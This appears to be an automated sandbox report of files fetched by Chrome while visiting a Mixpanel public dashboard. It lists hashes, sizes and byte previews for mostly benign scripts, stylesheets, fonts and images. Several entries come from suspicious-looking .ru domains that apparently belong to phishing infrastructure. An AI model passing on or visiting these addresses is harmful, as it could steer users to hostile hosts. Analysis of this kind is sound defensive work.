                                                                            File Type:Unicode text, UTF-8 text, with very long lines (11798)
                                                                            Category:downloaded
                                                                            Size (bytes):61915
                                                                            Entropy (8bit):5.537813440081131
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:AFF8D09A70305C43D3FEF06741D68A70
                                                                            SHA1:EBEFDF384433C097C409704DA8242E3B1DB92E04
                                                                            SHA-256:E6E2ADFCEDDF9ECE68642AC1E364F2220723DFE1D5706A6AE30D177352DC8254
                                                                            SHA-512:1C33FEBE329671340AEA8D51E2AF53DA4C65B355B5608993091681AA299C9E79380A89BE96B5DBBD4F66122E47750283EBA48D34B8B214C080332615770AEF5A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/6e0529260efb19e14ec3/public-boards.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="3fb86fdd-4a71-40cd-b101-e7dfdf4f7fa4",e._sentryDebugIdIdentifier="sentry-dbid-3fb86fdd-4a71-40cd-b101-e7dfdf4f7fa4")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:downloaded
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://kwzh.kdyukk.ru/machlo$agpzrfcb
                                                                            Preview:0
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):153
                                                                            Entropy (8bit):5.047356259973638
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:3D4BEB5707C91FDF671DA0E419A27480
                                                                            SHA1:BB0AC36D9F0A92CEEB861AAD42196FFF384C6543
                                                                            SHA-256:4C44AEC7458E4C1C23D85C2E66595C169B8EA6D506670478B1771CDE86C590C4
                                                                            SHA-512:E4E4462ACC4D5F30A8C06BD7953686F332971F5171E703396B10BE303418CD492D2EA7ABF1B7FC86C4021C72739F8A9639EA2BA076EA69C5E6F58132BA73353D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXL&oit=3&cp=33&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNTS16WPXL",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):151
                                                                            Entropy (8bit):4.9991012151130985
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:46B3C7D9AD1A95CD338CB73322137B85
                                                                            SHA1:D485F876EBF1B2C433E4518F47EC51E3529653A4
                                                                            SHA-256:49262E9F6CC7CBDC8B1C2DAA5736445E2B64A9110D8791620EDCD15B292383CA
                                                                            SHA-512:46610BAFB44D4556087EDC44678F07F0B53500DF44686754C2B482551F1CF3060B740EDF229E4BE569282460537E1A8CE8AB7A716A1430DD902A695C304A81FF
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WP&oit=3&cp=31&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNTS16WP",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65447)
                                                                            Category:downloaded
                                                                            Size (bytes):89501
                                                                            Entropy (8bit):5.289893677458563
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (10017)
                                                                            Category:downloaded
                                                                            Size (bytes):10245
                                                                            Entropy (8bit):5.437589264532084
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                            SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                            SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                            SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250326%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250326T174256Z&X-Amz-Expires=300&X-Amz-Signature=413aad58fc5a62a1cf0fc9060e10c34dc8b1d81ea0bb99120ce24ddb240ce13c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                            Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):36696
                                                                            Entropy (8bit):7.988666025644622
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                            SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                            SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                            SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/GDSherpa-regular.woff
                                                                            Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (15692)
                                                                            Category:downloaded
                                                                            Size (bytes):15741
                                                                            Entropy (8bit):5.321570147717865
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B8BA40BA962F1A9F3DB03AC5A04D1CA9
                                                                            SHA1:EF0C6CC0906023F42C9F54F75AC12F879AF20CD1
                                                                            SHA-256:AEB2BC1BC284A6825E0D838B07A074A16C4D69100E978C805F75677A8594D730
                                                                            SHA-512:7128AB0F8703ACBB3ECCBA6C1D90C88E1FDE31F056EA27C4FF7AD10D6BA0D08B3EF3460F95237482DEED2DA1A6CC0A1B3BD4A599F2B30FB73EB3C2E07068E69A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/a54fa472f3ee8b06515c/reports/global-styles.min.css
                                                                            Preview:a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;border:0;font:inherit;font-size:100%;margin:0;padding:0;text-rendering:optimizeLegibility;vertical-align:initial}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}table{border-collapse:collapse;border-spacing:0;vertical-align:middle}tbody,td,tfoot,th,thead,tr{vertical-align:inherit}h1,h2,h3,h4,h5,h6,strong,th{font-weight:700}p{margin:1em 0}h
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):141
                                                                            Entropy (8bit):4.841727787108492
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:945EE4596993AC7BCDFDA1761062E64B
                                                                            SHA1:49B184BFC34E29D09CC6CCC6493F157F0EB1E29C
                                                                            SHA-256:1FA3A3CBCB4AF2C3C086C0AF776F13F1BD16CB3646930E028C7890EAB72426DE
                                                                            SHA-512:429A4FDDF17D98BF9ABD0D8A08AC544F6DA13AA4273365468925AED2C627F8D4A1AF9FF4C70488D729B0E40A8A578E338EB122F6162B776B3F060C8541D40AB2
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuh&oit=3&cp=21&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuh",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:dropped
                                                                            Size (bytes):9648
                                                                            Entropy (8bit):7.9099172475143416
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4946EB373B18D178C93D473489673BB6
                                                                            SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                            SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                            SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8360)
                                                                            Category:downloaded
                                                                            Size (bytes):107659
                                                                            Entropy (8bit):5.380229396996978
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F0891CD49EFEC1401AF933C69F276BF7
                                                                            SHA1:E5B419DB448486AA7F3B34AD9961A5B2BBA17006
                                                                            SHA-256:09D1F4C989DDD017D8E7ADA7F88D14EFF3F11096CFAC83731696E48F2A516BDD
                                                                            SHA-512:BBBA30854BF101EF0655C7865B225ECC09A94591FD55BCB48BBF5653693158267F9FDF8A9043AFACD92120F244C5F24583C75C48EA26E73E80BACED7869C4950
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/d61a133c9842b45639c7/iron_apps_boards_src_dashboards-app_card_index_ts-iron_apps_boards_src_util_context_ts-iron_a-551d08.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="9c9f7f0e-8fdb-45bf-a44a-6f9184b595de",e._sentryDebugIdIdentifier="sentry-dbid-9c9f7f0e-8fdb-45bf-a44a-6f9184b595de")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (346)
                                                                            Category:downloaded
                                                                            Size (bytes):21822
                                                                            Entropy (8bit):5.118933307337861
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F8DD6290E818B7CE6754785E1CBC638C
                                                                            SHA1:402CF10CAC306231129B46A35A5C5583DA29F051
                                                                            SHA-256:034B480AFA6388E711C67E2BEE43E98BB14BA22976D97CE2CCD97578F24F979B
                                                                            SHA-512:334549454DA9799EDBC2D8AB238AF4AA28DA03914C1390A8E01739DB4E8E62A412244B17083743AD4946728E9F8AF22174F582DAAEDBA0A97EFDCA74B27E1A72
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/82535fa77fbcac7f7fd5/common/polyfills.min.js
                                                                            Preview:try{let t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},e=(new t.Error).stack.e&&(t._sentryDebugIds=t._sentryDebugIds||{},t._sentryDebugIds[e]="d7491172-bc6d-4dbd-bbf7-7f3bda6b5ae1",t._sentryDebugIdIdentifier="sentry-dbid-d7491172-bc6d-4dbd-bbf7-7f3bda6b5ae1")}catch(t){}{let t=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.t._sentryModuleMetadata=t._sentryModuleMetadata||{}.t._sentryModuleMetadata[(new t.Error).stack]=Object.assign({},t._sentryModuleMetadata[(new t.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let t=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.t.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):892
                                                                            Entropy (8bit):5.863167355052868
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:41D62CA205D54A78E4298367482B4E2B
                                                                            SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                            SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                            SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/qrkq6tjIc3r5nBX8S7OdUDvbneJNdxGQmnJ7dx0HaqNlcmCbG67140
                                                                            Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):35970
                                                                            Entropy (8bit):7.989503040923577
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                            SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                            SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                            SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/GDSherpa-bold.woff
                                                                            Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):132
                                                                            Entropy (8bit):4.760825077120797
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:DA54F14291C374447290701ABFFAEC4F
                                                                            SHA1:9E09D18A8268361EF8F2A4D10BE9E4AE1A1909C5
                                                                            SHA-256:47F6C075F79F856B71C631C906F4619C0F1828F00B6E36597E8C82842C293ADD
                                                                            SHA-512:77EE23D2F93306B705DAB42B049BFD596C54FE0941F18139811801853D888D293AF8E2C7C100E6C2783E8C7EB044BF7D99D611458A0B4C04F2C61C6A89026DDE
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCTZvpDcD9_H_EgUNX1f-DRIFDRObJGMhQ2MAhxNWlYMSSgk8R9UC5q7RbBIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IcV2q9dh3B5W?alt=proto
                                                                            Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKTAoLDc8jKv8aBAgJGAEKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:downloaded
                                                                            Size (bytes):247
                                                                            Entropy (8bit):4.724263676283733
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:05D9C2DBB007866D0706691F2056AE0B
                                                                            SHA1:6281F2CE18AE03839A8D7A1C5BDBD6F5774865A2
                                                                            SHA-256:76253F2459A014F74BCC6AC6BBB177D23DF90963710EA9A9EB02B9D2E6C1FFE0
                                                                            SHA-512:E4AE79132D39F33D3E07AE534E2371E3874D01CC024713885F9AF77B2AEB2FE591D994F34EA4F208F11955345535A59C88774A1FCFF5D9813C00E671C0241F09
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mixpanel.com/api/app/public/dashboards/75842ed5-2e21-48a8-81e7-e762e80766ad/metadata
                                                                            Preview:{"status": "ok", "results": {"project_timezone": "US/Pacific", "utc_offset": -420.0, "is_free_plan": true, "data_groups": [], "org_id": 2818876, "project_as_of_date": null, "event_properties": [], "people_properties": [], "event_definitions": []}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (36679)
                                                                            Category:downloaded
                                                                            Size (bytes):36815
                                                                            Entropy (8bit):4.907019697892933
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:1360476F2F7ED19D0570E6D077A95D19
                                                                            SHA1:88F1D76FCF07F3CBC34BA1E55FE2559EC006AEE3
                                                                            SHA-256:613B2986207EB8D41971FCEB77E096C32B8D9ED2F8DE5BF60511E198E3D96723
                                                                            SHA-512:E53682464E156193E6EE563DB36B914F81BF28473A97DA91B6C6C90BFB17953023EA047A87DF0F4EF5091CA622004C36CB90294C38E7D557F2553EDC4078829F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/244c2c215a17f54440b3/iron_apps_boards_src_dashboards-app_card_index_ts-iron_apps_boards_src_util_context_ts-iron_a-551d08.min.css
                                                                            Preview:.refresh-controls{align-items:center;display:flex;flex-shrink:0;justify-content:center;min-width:10px}.refresh-controls .refresh-button{border:1px solid var(--gray2);border-radius:16px;box-shadow:0 4px 10px 0 rgba(31,32,35,.16),0 0 2px 0 rgba(31,32,35,.48);display:flex;font-size:10px;height:18px;justify-content:flex-start;max-width:129px;padding:0}.refresh-controls .refresh-button .last-updated-text{text-align:left}.refresh-controls .refresh-button mp-spinner{height:12px;margin-left:-8px!important;margin-right:2px!important;width:12px}.refresh-controls .refresh-button svg-icon{color:#4f44e0;display:inline-block;height:15px;margin-left:-8px!important;margin-right:2px!important;min-height:15px;min-width:15px;position:relative;width:15px}.refresh-controls .refresh-button svg-icon svg{display:block;height:15px;left:0;min-height:15px;min-width:15px;position:absolute;top:0;width:15px}mp-text-card{height:100%;padding-left:10px}.card-text-content{height:100%}.card-text-content .card-text-conta
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (950)
                                                                            Category:downloaded
                                                                            Size (bytes):18631
                                                                            Entropy (8bit):5.264119216646635
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:76866425D4E041F9242E4263466E441B
                                                                            SHA1:3FCF6E718CDEFE1648F003D0B4E9FA8645CE28B7
                                                                            SHA-256:0DEE60D9AE2B7C6E2F3E5BB8E96F86F58022E44B7CE4E5EEC1358CD3E7973162
                                                                            SHA-512:E819BD9E4963EC2756387959686AEDF7D6B201E8F22D26B43F8D1DF030A3672E86830409C7F5AE971B5427D421D9F4AB1DB56495A67996FEF76EE81D65BC921A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/b4263aee3bb9f45f8fc7/iron_common_components_table-react_helpers_ts-iron_common_components_table-react_index_tsx.min.js
